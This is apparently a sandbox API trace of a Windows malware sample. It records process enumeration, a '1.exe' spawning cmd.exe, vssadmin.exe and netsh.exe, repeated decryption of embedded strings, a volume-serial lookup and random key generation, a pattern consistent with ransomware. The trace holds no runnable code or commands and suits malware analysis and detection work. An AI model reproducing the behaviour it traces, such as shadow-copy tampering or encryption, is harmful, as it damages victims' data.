th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0069.567] GetLastError () returned 0x12 [0069.567] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0069.568] GetLastError () returned 0x12 [0069.568] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0069.569] GetLastError () returned 0x12 [0069.569] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0069.570] GetLastError () returned 0x12 [0069.570] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.570] GetLastError () returned 0x12 [0069.570] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.571] GetLastError () returned 0x12 [0069.571] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0069.572] GetLastError () returned 0x12 [0069.572] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0069.573] GetLastError () returned 0x12 [0069.573] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.574] GetLastError () returned 0x12 [0069.574] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0069.575] GetLastError () returned 0x12 [0069.575] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0069.576] GetLastError () returned 0x12 [0069.576] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.576] GetLastError () returned 0x12 [0069.576] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.577] GetLastError () returned 0x12 [0069.577] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0069.578] GetLastError () returned 0x12 [0069.578] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.579] GetLastError () returned 0x12 [0069.579] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0069.579] GetLastError () returned 0x12 [0069.579] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0069.580] GetLastError () returned 0x12 [0069.580] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.581] GetLastError () returned 0x12 [0069.581] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0069.584] GetLastError () returned 0x12 [0069.584] Process32NextW (in: hSnapshot=0x330, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0069.584] CloseHandle (hObject=0x330) returned 1 [0069.584] Sleep (dwMilliseconds=0x1f4) Thread: id = 27 os_tid = 0xcc8 [0044.810] GetLogicalDrives () returned 0x4 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0044.810] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fe30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fe98 | out: phKey=0x2e6fe98*=0xf58ce8) returned 1 [0044.810] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x2e6fe80, dwFlags=0x0) returned 1 [0044.810] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x2e6fe4c | out: pbData=0x2a611f0, pdwDataLen=0x2e6fe4c) returned 1 [0044.810] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a614c8 [0044.810] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2bc [0044.810] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2c4 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a614f8 [0044.810] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fe64 | out: phKey=0x2e6fe64*=0xf590a8) returned 1 [0044.810] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x2e6fe4c, dwFlags=0x0) returned 1 [0044.810] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a614f8, pdwDataLen=0x2e6fe18 | out: pbData=0x2a614f8, pdwDataLen=0x2e6fe18) returned 1 [0044.810] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a64b00 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a64b28 [0044.810] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68958 [0044.810] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fdd4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fe3c | out: phKey=0x2e6fe3c*=0xf58e68) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x2e6fe24, dwFlags=0x0) returned 1 [0044.811] CryptDecrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68958, pdwDataLen=0x2e6fdf0 | out: pbData=0x2a68958, pdwDataLen=0x2e6fdf0) returned 1 [0044.811] CryptDestroyKey (hKey=0xf58e68) returned 1 [0044.811] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68958 | out: hHeap=0x2a60000) returned 1 [0044.811] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a64b00, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.811] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b28 | out: hHeap=0x2a60000) returned 1 [0044.811] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614f8 | out: hHeap=0x2a60000) returned 1 [0044.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2e6fea4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2e6fea4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.811] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b00 | out: hHeap=0x2a60000) returned 1 [0044.811] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a612a0 [0044.811] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fda8 | out: phKey=0x2e6fda8*=0xf59228) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x2e6fd90, dwFlags=0x0) returned 1 [0044.811] CryptDecrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a612a0, pdwDataLen=0x2e6fd5c | out: pbData=0x2a612a0, pdwDataLen=0x2e6fd5c) returned 1 [0044.811] CryptDestroyKey (hKey=0xf59228) returned 1 [0044.811] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a61238 [0044.811] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fda0 | out: phKey=0x2e6fda0*=0xf59168) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x2e6fd88, dwFlags=0x0) returned 1 [0044.811] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61238, pdwDataLen=0x2e6fd54 | out: pbData=0x2a61238, pdwDataLen=0x2e6fd54) returned 1 [0044.811] CryptDestroyKey (hKey=0xf59168) returned 1 [0044.811] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a614f8 [0044.811] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd98 | out: phKey=0x2e6fd98*=0xf58ee8) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x2e6fd80, dwFlags=0x0) returned 1 [0044.811] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a614f8, pdwDataLen=0x2e6fd4c | out: pbData=0x2a614f8, pdwDataLen=0x2e6fd4c) returned 1 [0044.811] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0044.811] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68790 [0044.811] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd90 | out: phKey=0x2e6fd90*=0xf58ce8) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x2e6fd78, dwFlags=0x0) returned 1 [0044.811] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68790, pdwDataLen=0x2e6fd44 | out: pbData=0x2a68790, pdwDataLen=0x2e6fd44) returned 1 [0044.811] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.811] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a61510 [0044.811] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd88 | out: phKey=0x2e6fd88*=0xf58ce8) returned 1 [0044.811] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x2e6fd70, dwFlags=0x0) returned 1 [0044.812] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61510, pdwDataLen=0x2e6fd3c | out: pbData=0x2a61510, pdwDataLen=0x2e6fd3c) returned 1 [0044.812] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0044.812] htonl (hostlong=0xb4197730) returned 0x307719b4 [0044.812] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x20, pbBuffer=0x2e6fe50 | out: pbBuffer=0x2e6fe50) returned 1 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x28) returned 0x2a64b00 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a61528 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a60598 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x14) returned 0x2a64b30 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a64b50 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a69ba8 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a64b68 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a69c30 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69cc0 [0044.812] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a69cd8 [0044.812] CryptAcquireContextW (in: phProv=0x9bfcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9bfcf4*=0xf4e248) returned 1 [0044.814] CryptGenRandom (in: hProv=0xf4e248, dwLen=0x55, pbBuffer=0x2e6fdd2 | out: pbBuffer=0x2e6fdd2) returned 1 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ce8 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a69d00 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69d88 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2) returned 0x2a69da0 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a69db0 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ed8 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a69fc8 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ef0 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a6a050 [0044.815] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a69da0, Size=0x82) returned 0x2a6a060 [0044.815] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a050, Size=0x100) returned 0x2a6a0f0 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f08 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a6a1f8 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f50 [0044.815] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a6a288 [0044.815] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a060, Size=0x104) returned 0x2a6a318 [0044.815] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a0f0, Size=0x200) returned 0x2a6a428 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69db0 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a428 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ef0 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69d00 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ce8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69fc8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ed8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a318 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69d88 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a1f8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69f08 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a288 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69f50 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a60598 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61528 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69c30 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b68 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ba8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b50 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69cd8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69cc0 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b00 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b30 | out: hHeap=0x2a60000) returned 1 [0044.816] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xa4) returned 0x2a69ba8 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614f8 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68790 | out: hHeap=0x2a60000) returned 1 [0044.816] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61510 | out: hHeap=0x2a60000) returned 1 [0044.816] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x14) returned 0x2a61238 [0044.817] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xe) returned 0x2a69f68 [0044.817] ResetEvent (hEvent=0x2c4) returned 1 [0044.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b3bdf, lpParameter=0x2a61238, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c8 [0044.817] CloseHandle (hObject=0x2c8) returned 1 [0044.817] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f80 [0044.817] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fda8 | out: phKey=0x2e6fda8*=0xf590a8) returned 1 [0044.817] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x2e6fd90, dwFlags=0x0) returned 1 [0044.817] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a69f80, pdwDataLen=0x2e6fd5c | out: pbData=0x2a69f80, pdwDataLen=0x2e6fd5c) returned 1 [0044.817] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.817] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f50 [0044.817] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fda0 | out: phKey=0x2e6fda0*=0xf58e28) returned 1 [0044.817] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2e6fd88, dwFlags=0x0) returned 1 [0044.817] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a69f50, pdwDataLen=0x2e6fd54 | out: pbData=0x2a69f50, pdwDataLen=0x2e6fd54) returned 1 [0044.817] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.817] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ec0 [0044.817] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd98 | out: phKey=0x2e6fd98*=0xf58e28) returned 1 [0044.817] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2e6fd80, dwFlags=0x0) returned 1 [0044.818] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a69ec0, pdwDataLen=0x2e6fd4c | out: pbData=0x2a69ec0, pdwDataLen=0x2e6fd4c) returned 1 [0044.818] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a681a0 [0044.818] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd90 | out: phKey=0x2e6fd90*=0xf58ee8) returned 1 [0044.818] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x2e6fd78, dwFlags=0x0) returned 1 [0044.818] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a681a0, pdwDataLen=0x2e6fd44 | out: pbData=0x2a681a0, pdwDataLen=0x2e6fd44) returned 1 [0044.818] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69fb0 [0044.818] CryptImportKey (in: hProv=0xf466e8, pbData=0x2e6fd20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e6fd88 | out: phKey=0x2e6fd88*=0xf58e28) returned 1 [0044.818] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2e6fd70, dwFlags=0x0) returned 1 [0044.818] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a69fb0, pdwDataLen=0x2e6fd3c | out: pbData=0x2a69fb0, pdwDataLen=0x2e6fd3c) returned 1 [0044.818] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.818] htonl (hostlong=0xb4197730) returned 0x307719b4 [0044.818] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x20, pbBuffer=0x2e6fe50 | out: pbBuffer=0x2e6fe50) returned 1 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x28) returned 0x2a614f8 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69de8 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a60598 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x14) returned 0x2a64b00 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f98 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a69c58 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69e00 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a69ce0 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69e48 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a6a000 [0044.818] CryptGenRandom (in: hProv=0xf4e248, dwLen=0x55, pbBuffer=0x2e6fdd2 | out: pbBuffer=0x2e6fdd2) returned 1 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69e90 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a6a1d0 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ef0 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x2) returned 0x2a6a160 